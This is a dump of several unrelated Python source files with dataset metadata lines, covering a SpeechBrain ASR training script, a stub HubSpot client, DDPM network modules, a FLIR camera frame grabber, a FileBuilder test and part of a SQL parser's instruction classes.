)
t.set_postfix(train_loss=self.avg_train_loss)
# Write training summary to tensorboard
self.tensorboard_writer.add_scalar("Train/Loss/tot_loss", loss, global_step)
self.tensorboard_writer.add_scalar("Train/Loss/ctc_loss", loss_ctc, global_step)
self.tensorboard_writer.add_scalar("Train/Loss/att_loss", loss_seq, global_step)
# Debug mode only runs a few batches
if self.debug and self.step == self.debug_batches:
break
if (
self.checkpointer is not None
and self.ckpt_interval_minutes > 0
and time.time() - last_ckpt_time
>= self.ckpt_interval_minutes * 60.0
):
run_on_main(self._save_intra_epoch_ckpt)
last_ckpt_time = time.time()
# Run train "on_stage_end" on all processes
self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)
self.avg_train_loss = 0.0
self.step = 0
# Validation stage
if valid_set is not None:
self.on_stage_start(Stage.VALID, epoch)
self.modules.eval()
avg_valid_loss = 0.0
with torch.no_grad():
for batch in tqdm(
valid_set, dynamic_ncols=True, disable=not enable
):
self.step += 1
loss = self.evaluate_batch(batch, stage=Stage.VALID)
avg_valid_loss = self.update_average(
loss, avg_valid_loss
)
# Debug mode only runs a few batches
if self.debug and self.step == self.debug_batches:
break
# Write validation summary to tensorboard
self.tensorboard_writer.add_scalar("Validation/Loss/tot_loss", avg_valid_loss, epoch)
self.tensorboard_writer.add_scalar("Validation/Accuracy/tot_acc", self.acc_metric.summarize(), epoch)
# Only run validation "on_stage_end" on main process
self.step = 0
run_on_main(
self.on_stage_end,
args=[Stage.VALID, avg_valid_loss, epoch],
)
# Debug mode only runs a few epochs
if self.debug and epoch == self.debug_epochs:
break
def on_evaluate_start(self, max_key=None, min_key=None):
"""perform checkpoint averge if needed"""
super().on_evaluate_start()
ckpts = self.checkpointer.find_checkpoints(
max_key=max_key, min_key=min_key
)
ckpt = sb.utils.checkpoints.average_checkpoints(
ckpts, recoverable_name="model", device=self.device
)
self.hparams.model.load_state_dict(ckpt, strict=True)
self.hparams.model.eval()
def dataio_prepare(hparams):
"""This function prepares the datasets to be used in the brain class.
It also defines the data processing pipeline through user-defined functions."""
data_folder = hparams["data_folder"]
# train_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
# csv_path=hparams["train_csv"], replacements={"data_root": data_folder},
# )
train_data = CurriculumOrientedDynamicDataset.from_csv(
csv_path=hparams["train_csv"], replacements={"data_root": data_folder},
)
ordering_info = hparams["ordering"]
batch_selection = hparams["batch_selection"]
batch_size = int(hparams["batch_size"])
train_data = train_data.curriculum_based_filtered_sorted(
ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size
)
# when sorting do not shuffle in dataloader ! otherwise is pointless
hparams["train_dataloader_opts"]["shuffle"] = False
# if hparams["sorting"] == "ascending":
# # we sort training data to speed up training and get better results.
# train_data = train_data.filtered_sorted(sort_key="duration")
# # when sorting do not shuffle in dataloader ! otherwise is pointless
# hparams["train_dataloader_opts"]["shuffle"] = False
# elif hparams["sorting"] == "descending":
# train_data = train_data.filtered_sorted(
# sort_key="duration", reverse=True
# )
# # when sorting do not shuffle in dataloader ! otherwise is pointless
# hparams["train_dataloader_opts"]["shuffle"] = False
# elif hparams["sorting"] == "random":
# pass
# else:
# raise NotImplementedError(
# "sorting must be random, ascending or descending"
# )
valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["valid_csv"], replacements={"data_root": data_folder},
)
valid_data = valid_data.filtered_sorted(sort_key="duration")
# test is separate
test_datasets = {}
for csv_file in hparams["test_csv"]:
name = Path(csv_file).stem
test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=csv_file, replacements={"data_root": data_folder}
)
test_datasets[name] = test_datasets[name].filtered_sorted(
sort_key="duration"
)
datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()]
# We get the tokenizer as we need it to encode the labels when creating
# mini-batches.
tokenizer = hparams["tokenizer"]
# 2. Define audio pipeline:
@sb.utils.data_pipeline.takes("wav")
@sb.utils.data_pipeline.provides("sig")
def audio_pipeline(wav):
sig = sb.dataio.dataio.read_audio(wav)
return sig
sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)
# 3. Define text pipeline:
@sb.utils.data_pipeline.takes("wrd")
@sb.utils.data_pipeline.provides(
"wrd", "tokens_list", "tokens_bos", "tokens_eos", "tokens"
)
def text_pipeline(wrd):
yield wrd
tokens_list = tokenizer.encode_as_ids(wrd)
yield tokens_list
tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list))
yield tokens_bos
tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
yield tokens_eos
tokens = torch.LongTensor(tokens_list)
yield tokens
sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)
# 4. Set output:
sb.dataio.dataset.set_output_keys(
datasets, ["id", "sig", "wrd", "tokens_bos", "tokens_eos", "tokens","duration"],
)
return train_data, valid_data, test_datasets, tokenizer
if __name__ == "__main__":
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# If distributed_launch=True then
# create ddp_group with the right communication protocol
sb.utils.distributed.ddp_init_group(run_opts)
# 1. # Dataset prep (parsing Librispeech)
from librispeech_prepare import prepare_librispeech # noqa
# Create experiment directory
sb.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# multi-gpu (ddp) save data preparation
run_on_main(
prepare_librispeech,
kwargs={
"data_folder": hparams["data_folder"],
"tr_splits": hparams["train_splits"],
"dev_splits": hparams["dev_splits"],
"te_splits": hparams["test_splits"],
"save_folder": hparams["data_folder"],
"merge_lst": hparams["train_splits"],
"merge_name": hparams["train_csv"],
"skip_prep": hparams["skip_prep"],
},
)
# here we create the datasets objects as well as tokenization and encoding
train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams)
# # We download the pretrained LM from HuggingFace (or elsewhere depending on
# # the path given in the YAML file). The tokenizer is loaded at the same time.
run_on_main(hparams["pretrainer"].collect_files)
hparams["pretrainer"].load_collected(device=run_opts["device"])
# Trainer initialization
asr_brain = ASR(
modules=hparams["modules"],
opt_class=hparams["Adam"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
# adding objects to trainer:
asr_brain.tokenizer = hparams["tokenizer"]
# Training
asr_brain.fit(
asr_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["train_dataloader_opts"],
valid_loader_kwargs=hparams["valid_dataloader_opts"],
)
# Testing
for k in test_datasets.keys(): # keys are test_clean, test_other etc
asr_brain.hparams.wer_file = os.path.join(
hparams["output_folder"], "wer_{}.txt".format(k)
)
with torch.no_grad():
asr_brain.evaluate(
test_datasets[k],
max_key="ACC",
test_loader_kwargs=hparams["test_dataloader_opts"],
)
# # print(train_data)
# train_set = make_dataloader(
# valid_data ,
# stage = Stage.TRAIN,
# **hparams["valid_dataloader_opts"]
# )
# with tqdm(
# train_set,
# initial=0,
# dynamic_ncols=True,
# disable=False,
# ) as t:
# cnt = 0
# for batch in t:
# # print(batch.duration)
# # print(batch.wrd)
# # if cnt == 5:
# # exit()
# cnt += 1
| 2.28125 | 2 |
app/services/hubspot.py | PrudhviRaj5/boilerplate-sanic | 0 | 12796226 | import requests
import ujson
# from b2b_app.config import CONFIG
class Hubspot:
def __init__(self, hub_id, refresh_token):
self.hub_id = hub_id
self.refresh_token = refresh_token
self.access_token = self.get_access_token(refresh_token)
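        # NOTE (editor): get_access_token() below is still a stub, so
        # access_token stays None until the token exchange is implemented.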
self._lists_url = 'https://api.hubapi.com/contacts/v1/lists'
pass
def get_access_token(self, refresh_token):
pass
def update_access_token():
pass
##### ACCOUNT APIS #####
def get_account_by_id():
pass
# read all companies
def get_all_accounts():
pass
# create company in hubspot
def create_account():
pass
# update company
def update_account():
#
pass
def add_contact_to_account():
pass
def get_associated_deals_for_account():
pass
##### CONTACT APIS #####
def get_contact_by_id():
pass
# read all companies
    def get_all_contacts(self):
        url = self._lists_url + '/all/contacts/all'
querystring = {
'vid-offset': '0',
'count': '10',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
# create contact
def create_contact():
pass
# update contact
def update_contact():
pass
# deleting contact
def delete_contact():
pass
def get_associated_deals_for_contact():
pass
##### LISTS APIS #####
    def get_all_static_lists(self):
url = self._lists_url
querystring = {
'offset': '0',
'count': '10',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
    def get_all_dynamic_lists(self):
url = self._lists_url + '/dynamic'
querystring = {
'offset': '0',
'count': '10',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
def get_list_by_id(self, list_id):
url = self._lists_url + '/' + list_id
querystring = {
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
def create_static_list(self, list_name):
url = self._lists_url
querystring = {
'hapikey': '<KEY>',
}
payload = ujson.dumps({
'name': list_name,
'dynamic': False,
'portalId': 5225356,
'filters': [],
})
response = requests.request(
'POST',
url,
data=payload,
params=querystring
)
print(response.text)
    def create_dynamic_list(self, list_name):
url = self._lists_url
querystring = {
'hapikey': '<KEY>',
}
payload = ujson.dumps({
'name': list_name,
'dynamic': True,
'portalId': 5225356,
'filters': [],
})
response = requests.request(
'POST',
url,
data=payload,
params=querystring
)
print(response.text)
pass
def delete_list():
pass
def get_all_contacts_from_a_list(self, list_id):
url = self._lists_url + '/' + list_id + '/contacts/all'
querystring = {
'vidOffset': '0',
'count': '100',
'hapikey': '<KEY>',
}
response = requests.request(
'GET',
url,
params=querystring
)
print(response.text)
def add_contacts_in_a_static_list(self, list_id, array_of_ids):
url = self._lists_url + '/' + list_id + '/add'
querystring = {
'hapikey': '<KEY>',
}
payload = ujson.dumps({
            'vids': array_of_ids
})
response = requests.request(
'POST',
url,
data=payload,
params=querystring
)
print(response.text)
##### DEAL APIS #####
# create deal
def get_deal_owner_by_id():
# check deal id or owner id
pass
def create_deal():
pass
def associate_contact_to_deal():
pass
def associate_account_to_deal():
pass
def dissociate_contact_from_deal():
pass
def find_deal_owner():
# yes
pass
def test():
pass
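# --- Usage sketch (added for illustration only; not part of the original
# --- module). The hub id and refresh token below are placeholders, and the
# --- '<KEY>' hapikey used inside the methods above must be replaced with a
# --- real API key before any request can succeed.
if __name__ == '__main__':
    client = Hubspot(hub_id='12345', refresh_token='hypothetical-refresh-token')
    # Read-only calls simply print the raw JSON response, e.g.:
    # client.get_all_static_lists()
    # client.get_list_by_id('42')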
| 2.40625 | 2 |
mmgen/models/architectures/ddpm/modules.py | plutoyuxie/mmgeneration | 718 | 12796227 | <reponame>plutoyuxie/mmgeneration<gh_stars>100-1000
# Copyright (c) OpenMMLab. All rights reserved.
from copy import deepcopy
from functools import partial
import mmcv
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ACTIVATION_LAYERS
from mmcv.cnn.bricks import build_activation_layer, build_norm_layer
from mmcv.cnn.utils import constant_init
from mmgen.models.builder import MODULES, build_module
class EmbedSequential(nn.Sequential):
"""A sequential module that passes timestep embeddings to the children that
support it as an extra input.
Modified from
https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35
"""
def forward(self, x, y):
for layer in self:
if isinstance(layer, DenoisingResBlock):
x = layer(x, y)
else:
x = layer(x)
return x
@ACTIVATION_LAYERS.register_module()
class SiLU(nn.Module):
r"""Applies the Sigmoid Linear Unit (SiLU) function, element-wise.
The SiLU function is also known as the swish function.
Args:
input (bool, optional): Use inplace operation or not.
Defaults to `False`.
"""
def __init__(self, inplace=False):
super().__init__()
if torch.__version__ < '1.6.0' and inplace:
mmcv.print_log('Inplace version of \'SiLU\' is not supported for '
                           f'torch < 1.6.0, found \'{torch.__version__}\'.')
self.inplace = inplace
def forward(self, x):
"""Forward function for SiLU.
Args:
x (torch.Tensor): Input tensor.
Returns:
torch.Tensor: Tensor after activation.
"""
if torch.__version__ < '1.6.0':
return x * torch.sigmoid(x)
return F.silu(x, inplace=self.inplace)
@MODULES.register_module()
class MultiHeadAttention(nn.Module):
"""An attention block allows spatial position to attend to each other.
Originally ported from here, but adapted to the N-d case.
https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa
Args:
in_channels (int): Channels of the input feature map.
num_heads (int, optional): Number of heads in the attention.
norm_cfg (dict, optional): Config for normalization layer. Default
to ``dict(type='GN', num_groups=32)``
"""
def __init__(self,
in_channels,
num_heads=1,
norm_cfg=dict(type='GN', num_groups=32)):
super().__init__()
self.num_heads = num_heads
_, self.norm = build_norm_layer(norm_cfg, in_channels)
self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1)
self.proj = nn.Conv1d(in_channels, in_channels, 1)
self.init_weights()
@staticmethod
def QKVAttention(qkv):
channel = qkv.shape[1] // 3
q, k, v = torch.chunk(qkv, 3, dim=1)
scale = 1 / np.sqrt(np.sqrt(channel))
weight = torch.einsum('bct,bcs->bts', q * scale, k * scale)
weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype)
weight = torch.einsum('bts,bcs->bct', weight, v)
return weight
def forward(self, x):
"""Forward function for multi head attention.
Args:
x (torch.Tensor): Input feature map.
Returns:
torch.Tensor: Feature map after attention.
"""
b, c, *spatial = x.shape
x = x.reshape(b, c, -1)
qkv = self.qkv(self.norm(x))
qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2])
h = self.QKVAttention(qkv)
h = h.reshape(b, -1, h.shape[-1])
h = self.proj(h)
return (h + x).reshape(b, c, *spatial)
def init_weights(self):
constant_init(self.proj, 0)
@MODULES.register_module()
class TimeEmbedding(nn.Module):
"""Time embedding layer, reference to Two level embedding. First embedding
time by an embedding function, then feed to neural networks.
Args:
in_channels (int): The channel number of the input feature map.
embedding_channels (int): The channel number of the output embedding.
embedding_mode (str, optional): Embedding mode for the time embedding.
Defaults to 'sin'.
embedding_cfg (dict, optional): Config for time embedding.
Defaults to None.
act_cfg (dict, optional): Config for activation layer. Defaults to
``dict(type='SiLU', inplace=False)``.
"""
def __init__(self,
in_channels,
embedding_channels,
embedding_mode='sin',
embedding_cfg=None,
act_cfg=dict(type='SiLU', inplace=False)):
super().__init__()
self.blocks = nn.Sequential(
nn.Linear(in_channels, embedding_channels),
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_channels))
# add `dim` to embedding config
embedding_cfg_ = dict(dim=in_channels)
if embedding_cfg is not None:
embedding_cfg_.update(embedding_cfg)
if embedding_mode.upper() == 'SIN':
self.embedding_fn = partial(self.sinusodial_embedding,
**embedding_cfg_)
else:
raise ValueError('Only support `SIN` for time embedding, '
f'but receive {embedding_mode}.')
@staticmethod
def sinusodial_embedding(timesteps, dim, max_period=10000):
"""Create sinusoidal timestep embeddings.
Args:
timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape
as ``[bz, ]``, one per batch element.
dim (int): The dimension of the embedding.
max_period (int, optional): Controls the minimum frequency of the
embeddings. Defaults to ``10000``.
Returns:
torch.Tensor: Embedding results shape as `[bz, dim]`.
"""
half = dim // 2
freqs = torch.exp(
-np.log(max_period) *
torch.arange(start=0, end=half, dtype=torch.float32) /
half).to(device=timesteps.device)
args = timesteps[:, None].float() * freqs[None]
embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)
if dim % 2:
embedding = torch.cat(
[embedding, torch.zeros_like(embedding[:, :1])], dim=-1)
return embedding
def forward(self, t):
"""Forward function for time embedding layer.
Args:
t (torch.Tensor): Input timesteps.
Returns:
torch.Tensor: Timesteps embedding.
"""
return self.blocks(self.embedding_fn(t))
@MODULES.register_module()
class DenoisingResBlock(nn.Module):
"""Resblock for the denoising network. If `in_channels` not equals to
`out_channels`, a learnable shortcut with conv layers will be added.
Args:
in_channels (int): Number of channels of the input feature map.
embedding_channels (int): Number of channels of the input embedding.
use_scale_shift_norm (bool): Whether use scale-shift-norm in
`NormWithEmbedding` layer.
dropout (float): Probability of the dropout layers.
out_channels (int, optional): Number of output channels of the
ResBlock. If not defined, the output channels will equal to the
`in_channels`. Defaults to `None`.
norm_cfg (dict, optional): The config for the normalization layers.
            Defaults to ``dict(type='GN', num_groups=32)``.
act_cfg (dict, optional): The config for the activation layers.
Defaults to ``dict(type='SiLU', inplace=False)``.
shortcut_kernel_size (int, optional): The kernel size for the shortcut
conv. Defaults to ``1``.
"""
def __init__(self,
in_channels,
embedding_channels,
use_scale_shift_norm,
dropout,
out_channels=None,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
shortcut_kernel_size=1):
super().__init__()
out_channels = in_channels if out_channels is None else out_channels
_norm_cfg = deepcopy(norm_cfg)
_, norm_1 = build_norm_layer(_norm_cfg, in_channels)
conv_1 = [
norm_1,
build_activation_layer(act_cfg),
nn.Conv2d(in_channels, out_channels, 3, padding=1)
]
self.conv_1 = nn.Sequential(*conv_1)
norm_with_embedding_cfg = dict(
in_channels=out_channels,
embedding_channels=embedding_channels,
use_scale_shift=use_scale_shift_norm,
norm_cfg=_norm_cfg)
self.norm_with_embedding = build_module(
dict(type='NormWithEmbedding'),
default_args=norm_with_embedding_cfg)
conv_2 = [
build_activation_layer(act_cfg),
nn.Dropout(dropout),
nn.Conv2d(out_channels, out_channels, 3, padding=1)
]
self.conv_2 = nn.Sequential(*conv_2)
assert shortcut_kernel_size in [
1, 3
], ('Only support `1` and `3` for `shortcut_kernel_size`, but '
f'receive {shortcut_kernel_size}.')
self.learnable_shortcut = out_channels != in_channels
if self.learnable_shortcut:
shortcut_padding = 1 if shortcut_kernel_size == 3 else 0
self.shortcut = nn.Conv2d(
in_channels,
out_channels,
shortcut_kernel_size,
padding=shortcut_padding)
self.init_weights()
def forward_shortcut(self, x):
if self.learnable_shortcut:
return self.shortcut(x)
return x
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
shortcut = self.forward_shortcut(x)
x = self.conv_1(x)
x = self.norm_with_embedding(x, y)
x = self.conv_2(x)
return x + shortcut
def init_weights(self):
# apply zero init to last conv layer
constant_init(self.conv_2[-1], 0)
@MODULES.register_module()
class NormWithEmbedding(nn.Module):
"""Nornalization with embedding layer. If `use_scale_shift == True`,
embedding results will be chunked and used to re-shift and re-scale
normalization results. Otherwise, embedding results will directly add to
input of normalization layer.
Args:
in_channels (int): Number of channels of the input feature map.
        embedding_channels (int): Number of channels of the input embedding.
norm_cfg (dict, optional): Config for the normalization operation.
Defaults to `dict(type='GN', num_groups=32)`.
act_cfg (dict, optional): Config for the activation layer. Defaults
to `dict(type='SiLU', inplace=False)`.
use_scale_shift (bool): If True, the output of Embedding layer will be
split to 'scale' and 'shift' and map the output of normalization
layer to ``out * (1 + scale) + shift``. Otherwise, the output of
Embedding layer will be added with the input before normalization
operation. Defaults to True.
"""
def __init__(self,
in_channels,
embedding_channels,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
use_scale_shift=True):
super().__init__()
self.use_scale_shift = use_scale_shift
_, self.norm = build_norm_layer(norm_cfg, in_channels)
embedding_output = in_channels * 2 if use_scale_shift else in_channels
self.embedding_layer = nn.Sequential(
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_output))
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
embedding = self.embedding_layer(y)[:, :, None, None]
if self.use_scale_shift:
scale, shift = torch.chunk(embedding, 2, dim=1)
x = self.norm(x)
x = x * (1 + scale) + shift
else:
x = self.norm(x + embedding)
return x
@MODULES.register_module()
class DenoisingDownsample(nn.Module):
"""Downsampling operation used in the denoising network. Support average
pooling and convolution for downsample operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether use convolution operation for
downsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
if with_conv:
self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1)
else:
            self.downsample = nn.AvgPool2d(kernel_size=2, stride=2)
def forward(self, x):
"""Forward function for downsampling operation.
Args:
x (torch.Tensor): Feature map to downsample.
Returns:
torch.Tensor: Feature map after downsampling.
"""
return self.downsample(x)
@MODULES.register_module()
class DenoisingUpsample(nn.Module):
"""Upsampling operation used in the denoising network. Allows users to
apply an additional convolution layer after the nearest interpolation
operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether apply an additional convolution
layer after upsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
        self.with_conv = with_conv
        if with_conv:
            self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1)
def forward(self, x):
"""Forward function for upsampling operation.
Args:
x (torch.Tensor): Feature map to upsample.
Returns:
torch.Tensor: Feature map after upsampling.
"""
x = F.interpolate(x, scale_factor=2, mode='nearest')
if self.with_conv:
x = self.conv(x)
return x
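# --- Minimal shape-check sketch (added for illustration; not part of the
# --- original mmgeneration module). It only exercises the sinusoidal
# --- timestep embedding defined above.
if __name__ == '__main__':
    t = torch.arange(4)
    emb = TimeEmbedding.sinusodial_embedding(t, dim=8)
    print(emb.shape)  # expected: torch.Size([4, 8])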
| 2.265625 | 2 |
0_PythonFundamental/1_15_conditioning2.py | hnwarid/DQLabAcademy | 0 | 12796228 | jam = 13
if 5 <= jam < 12: # when the hour is between 5 and 12
    print("Selamat pagi!")
elif jam >= 12 and jam < 17: # when the hour is between 12 and 17 # simplified: elif 12 <= jam < 17
    print("Selamat siang!")
elif jam >= 17 and jam < 19: # when the hour is between 17 and 19
    print("Selamat sore!")
else: # anything other than the conditions above
    print("Selamat malam!")
| 3.765625 | 4 |
flir_frame_grabber.py | ralphkok/flir-frame-grabber | 1 | 12796229 | <filename>flir_frame_grabber.py
import PySpin
import threading
import time
import cv2
class FLIRFrameGrabber:
_is_camera_inited = False
_latest_camera_frame = None
_last_frame_grab_time = 0
_frame_grab_fps = 0
def is_running(self):
return self._is_running
def get_camera(self):
return self._camera
def get_dimensions(self):
return (self._camera_width, self._camera_height)
def get_fps(self):
return self._frame_grab_fps
def set_latest_frame(self, frame):
self._latest_camera_frame = frame
now = time.time()
duration = now - self._last_frame_grab_time
self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration)
self._last_frame_grab_time = now
def get_latest_frame(self):
return self._latest_camera_frame is not None, self._latest_camera_frame
def __init__(self, serial=None):
if serial is None:
raise Exception("Please provide a valid FLIR camera serial number")
self._serial = serial;
self._system = PySpin.System.GetInstance()
self._camera_list = self._system.GetCameras()
self._camera = self._camera_list.GetBySerial(serial)
self._camera.Init()
self._camera_width = self._camera.Width()
self._camera_height = self._camera.Height()
self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous)
self._camera.BeginAcquisition()
self._is_camera_inited = True
self._is_running = False
def deinit(self):
self.stop()
if (self._is_camera_inited is True):
self._is_camera_inited = False
self._camera.EndAcquisition()
self._camera.DeInit()
del self._camera
del self._camera_width
del self._camera_height
self._camera_list.Clear()
del self._camera_list
self._system.ReleaseInstance()
del self._system
del self._serial
def start(self, num_threads = 1):
if (self._is_running is not True):
self._is_running = True
self._threads = []
for i in range(num_threads):
worker = FrameGrabWorker(i)
thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False)
thread.start()
self._threads.append(thread)
def stop(self):
if (self._is_running is True):
self._is_running = False
for thread in self._threads:
thread.join()
del self._threads
if (self._latest_camera_frame is not None):
self._latest_camera_frame = None
class FrameGrabWorker:
def __init__(self, index):
self._index = index
self._lock = threading.Lock()
def get_camera_frame(self, target):
while target.is_running():
with self._lock:
frame = target.get_camera().GetNextImage()
width, height = target.get_dimensions()
img = frame.GetData().reshape(height, width)
target.set_latest_frame(img)
frame.Release() | 2.5 | 2 |
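# --- Usage sketch (illustrative only; not part of the original module).
# --- '00000000' stands in for a real FLIR camera serial number, and a
# --- connected camera with the Spinnaker/PySpin runtime is assumed.
if __name__ == '__main__':
    grabber = FLIRFrameGrabber(serial='00000000')
    grabber.start(num_threads=1)
    try:
        time.sleep(1)  # give the worker thread a moment to grab a frame
        ok, frame = grabber.get_latest_frame()
        if ok:
            cv2.imwrite('latest_frame.png', frame)
    finally:
        grabber.deinit()  # stops the worker threads and releases the camera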
file_builder/test/lambda_test.py | btrekkie/file-builder | 1 | 12796230 | import os
from .. import FileBuilder
from .file_builder_test import FileBuilderTest
class LambdaTest(FileBuilderTest):
"""Tests that ``FileBuilder`` methods accept lambda arguments.
Tests that ``FileBuilder`` methods accept lambdas for arguments that
must be callables.
"""
def _build_file(self, builder, filename):
"""Build file function for ``LambdaTest``."""
self._write(filename, 'text')
def _subbuild(self, builder, dir_):
"""Subbuild function for ``LambdaTest``."""
builder.build_file(
os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file)
builder.build_file(
os.path.join(dir_, 'Output2.txt'), 'build_file',
lambda builder, filename: self._write(filename, 'text'))
def _build(self, builder):
"""Build function for ``LambdaTest``."""
builder.subbuild(
'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1'))
builder.subbuild(
'subbuild',
lambda builder, dir_: self._subbuild(builder, dir_),
os.path.join(self._temp_dir, 'Dir2'))
def test_lambda(self):
"""Test that ``FileBuilder`` methods accept lambda arguments.
Test that ``FileBuilder`` methods accept lambdas for arguments
that must be callable.
"""
FileBuilder.build(self._cache_filename, 'lambda_test', self._build)
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text')
FileBuilder.clean(self._cache_filename, 'lambda_test')
self.assertEqual([], os.listdir(self._temp_dir))
FileBuilder.build(
self._cache_filename, 'lambda_test',
lambda builder: self._build(builder))
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text')
self._check_contents(
os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text')
| 2.78125 | 3 |
parser/team09/instrucciones.py | MinervaVilchez/tytus | 0 | 12796231 | <filename>parser/team09/instrucciones.py
import tabla_simbolos as TS
import Errores as E
base_actual = None
class Instruccion():
def __init__(self, tipo, instruccion):
self.tipo = tipo
self.instruccion = instruccion
class Select():
def __init__(self, dist, selcol, fromcol, joins, order, conditions):
self.dist = dist
self.selcol = selcol
self.fromcol = fromcol
self.joins = joins
self.order = order
self.conditions = conditions
    def execute(self):
        # Call the method that will perform the select
        print('ejecutando select')
class AlterTable():
def __init__(self, id, cols, constrain, fkey, ref):
self.id = id
self.cols = cols
self.constrain = constrain
self.fkey = fkey
self.ref = ref
def execute(self):
print('ejecutando alter table')
print('id : ' + str(self.id))
print('cols : ' + str(self.cols))
print('constrain : ' + str(self.constrain))
print('foreing keys :' + str(self.fkey))
print('references : ' + str(self.ref))
class CreateDB():
def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string, string, integer
        self.replace = replace # if it already exists, replace/modify it
        self.ifnot = ifnot # if it already exists, do not create it
        self.id = id # database name
        self.owner = owner # name/id of the creator
        self.mode = mode # storage mode
def execute(self, ts_global):
nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None)
        existe = False # flag to check whether it already exists
        bases = ts_global.get_databases() # get all databases
        for base in bases: # go through the list of databases
            if base.id == self.id: # and check whether it exists
                existe = True # if it exists, flip the flag
                break # and stop checking
        if not self.ifnot: # without "IF NOT EXISTS", create/replace it
            if self.replace: # "OR REPLACE" was given
                if existe: # if the database exists
                    ts_global.drop_db(self.id) # drop it, then
                    ts_global.agregar_simbolo(nueva_base) # add the new symbol
            else: # "OR REPLACE" was not given
                if existe: # if it exists, it is an error
                    nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos con el nombre \'' + self.id + '\'.')
                    #ls_error.append(nuevo_error) # add the error to the list
                else: # if it does not exist
                    ts_global.agregar_simbolo(nueva_base) # add the new symbol
        else: # "IF NOT EXISTS" was given
            if self.replace: # combining it with "OR REPLACE" is an error
                nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \'OR REPLACE\' e \'IF NOT EXISTS\'.')
                #ls_error.append(nuevo_error) # add the error to the list
            else: # "OR REPLACE" was not given
                if not existe: # if the database does not exist
                    ts_global.agregar_simbolo(nueva_base) # add the new symbol, otherwise do nothing
class UseDB():
    def __init__(self, id): # string
        self.id = id # database name
    def execute(self, ts_global):
        bases = ts_global.get_databases() # get all databases
        for base in bases: # check whether it exists:
            if base.id == self.id: # if it does exist, return the id
                return self.id # if not, it is an error
        new_error = E.Errores('Semántico.', 'La base de datos \'' + self.id + '\' no existe.')
        #ls_error.append(new_error) # add the error to the list
        return None # and return None
class ShowDB():
def __init__(self):
print('show')
def execute(self, ts_global):
        bases = ts_global.get_databases() # get all databases
        if len(bases) == 0: # if there are no databases
            return '\n\tNo hay bases de datos creadas.\n' # return a message
        respuesta = '\n' # otherwise,
        for base in bases: # go through the list,
            respuesta = respuesta + '\t' + base.id + '\n' # concatenate the names
        return respuesta + '\n' # and return them
class Drop():
